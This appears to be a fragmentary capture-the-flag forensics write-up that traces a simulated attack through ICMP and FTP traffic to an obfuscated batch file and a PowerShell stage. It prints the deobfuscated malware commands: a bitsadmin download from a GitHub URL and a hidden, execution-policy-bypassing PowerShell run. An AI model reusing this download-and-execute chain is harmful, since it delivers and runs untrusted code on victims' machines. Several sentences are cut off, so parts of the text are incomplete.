Olivia's Boxter
Description¶
Solution¶
Going through ICMP protocol, we can see some message there: “Boss, i have hacked into someone computer. Let me try the new malware we developed here!”
Going through the FTP stream we can see the attacker log in using FTP and and perform file transferring.
Looking the next stream would be the file that is transferred, which looks like an obfuscated batch file. We can search for batch deobfusctator online to get the content of the file
OliRod.bat
We can navigate to the GitHub link to download the PowerShell file named bitsadmin.exe /transfer "78fb98208c7f6ee6c0ed7bf761e614eb" https://raw.githubusercontent.com/6E3372/OliRod/main/Photo/Olivia.ps1 \Olivia.ps1
powershell.exe -NoP -wiNdowSTYLE hiddeN -ExEcuTioNPolicy BypAss -CoMmAND "\Olivia.ps1"
Olivia.ps1
.


OliviaRodrigo.exe
and rename it into random strings.

strings
command we can guess that this might be a Python executable. Therefore, we can try to decompile it and get the source code.

